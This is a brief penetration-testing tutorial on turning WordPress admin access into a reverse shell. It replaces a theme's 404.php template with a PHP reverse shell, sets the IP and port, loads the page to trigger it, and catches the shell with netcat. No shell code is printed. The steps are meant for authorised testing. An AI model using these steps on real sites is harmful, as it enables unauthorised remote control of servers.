Reverse Shell from any WordPress Site : Admin Dashboard

The scenario : We are pentesting a wordpress site & eventually got admin credentials. After logging in, we get an admin dashboard from where we can edit themes or plugins.

From this situation, a proper reverse shell can be gained leveraging what we already have. Let's talk about this.

STEP 1

First go to Appearance > Editor > 404 Template from the admin dashboard left hand corner.

You will see a white box with some PHP code. Here we will inject our reverse shell.

STEP 2

Now remove all the Php code from the box. Copy paste a php reverse shell. You can use the pentestmonkey one, that’s really good. Then change the IP and Port of the reverse shell as you need to. Hit Update File button at the bottom. It will update the actual 404.php page code to our reverse shell code. If it gives an error or does not update, the theme might not be vulnerable. Then change the Theme on top right to another one and then inject that theme’s 404 template.

STEP 3

Now execute the reverse shell and catch your shell with netcat. To execute it, open another tab and navigate to the theme’s 404 error page. It usually resides on http://IP/wordpress/wp-content/theme/the_theme_you_chose/404.php .

For example, I injected twentyfourteen theme that’s why I navigated to this URL for my machine.

Pressing enter will automatically trigger the shell. You can catch it with netcat listener.